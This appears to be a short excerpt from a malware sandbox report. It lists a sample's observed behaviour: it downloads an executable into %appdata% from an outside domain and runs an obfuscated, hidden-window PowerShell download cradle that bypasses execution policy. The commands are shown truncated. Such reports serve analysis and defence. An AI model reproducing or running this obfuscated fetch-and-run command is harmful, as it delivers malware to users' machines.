Technical Information
- http://h2oclocks.com/new.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^wE^RSh^eL^l.^EX^e -exE^CUTI^O^NPoLI^cY by^PaSS -no^prOfI^lE -^W^In^d^OW^sT^Y^lE HiD^dEN (^N^e^W-^OBj^EcT S^y^ste^m.N^E^T^.^WEB^Cl^iEn^t).^DOWn^L^o^a^d^Fi^L^E^('http://h2o...
- DNS ASK h2###ocks.com
- '<SYSTEM32>\cmd.exe' /C "p^O^wE^RSh^eL^l.^EX^e -exE^CUTI^O^NPoLI^cY by^PaSS -no^prOfI^lE -^W^In^d^OW^sT^Y^lE HiD^dEN (^N^e^W-^OBj^EcT S^y^ste^m.N^E^T^.^WEB^Cl^iEn^t).^DOWn^L^o^a^d^Fi^L^E^('http://h2o...' (with hidden window)